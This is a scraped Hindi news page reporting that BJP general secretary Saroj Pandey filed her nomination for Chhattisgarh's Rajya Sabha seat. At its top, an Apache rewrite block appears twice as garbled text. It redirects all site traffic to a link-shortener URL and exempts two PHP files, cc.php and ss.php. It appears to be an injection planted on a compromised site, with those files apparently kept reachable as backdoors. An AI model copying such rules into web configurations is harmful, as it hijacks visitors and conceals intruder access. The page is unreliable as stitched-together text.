
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 298
Previousरायपुर। छत्तीसगढ़ से राज्यसभा की एकमात्र सीट के लिए भाजपा की राष्ट्रीय महामंत्री डॉ. सरोज पांडेय को उम्मीदवार बनाया गया है। डॉ. सरोज पांडेय ने सोमवार को विधानसभा रायपुर में नामांकन दाखिल कर दिया है। चोटिल अवस्था में सरोज ने अपने समर्थकों की मौजूदगी में नामांकन दाखिल किया।
बता दें कि बीते रविवार देर शाम तक चली बैठक के बाद भाजपा के राष्ट्रीय अध्यक्ष अमित शाह ने सरोज पांडेय के नाम की घोषणा की थी। आज नामांकन दाखिल करने से पहले सरोज गृह नगर भिलाई से उनके समर्थकों ने रैली निकाली। भिलाई से रायपुर के बीच जगह—जगह सरोज पांडेय का स्वागत किया गया। छत्तीसगढ़ के प्रदेश भाजपा प्रभारी डॉ. अनिल जैन को उत्तर प्रदेश कोटे से राज्यसभा भेजने का निर्णय लिया गया। छत्तीसगढ़ में प्रदेश अध्यक्ष धरमलाल कौशिक की मजबूत दावेदारी मानी जा रही थी, लेकिन आखिरी समय में राष्ट्रीय महामंत्रियों को राज्यसभा में भेजने के फार्मूले पर अमल करने के कारण सरोज को टिकट देना बताया जा रहा है। सरोज पिछले लोकसभा चुनाव में दुर्ग से कांग्रेस के ताम्रध्वज साहू से हार गई थीं। हार के बावजूद सरोज को भाजपा ने राष्ट्रीय महामंत्री बनाया और महाराष्ट्र का प्रभारी भी बनाया।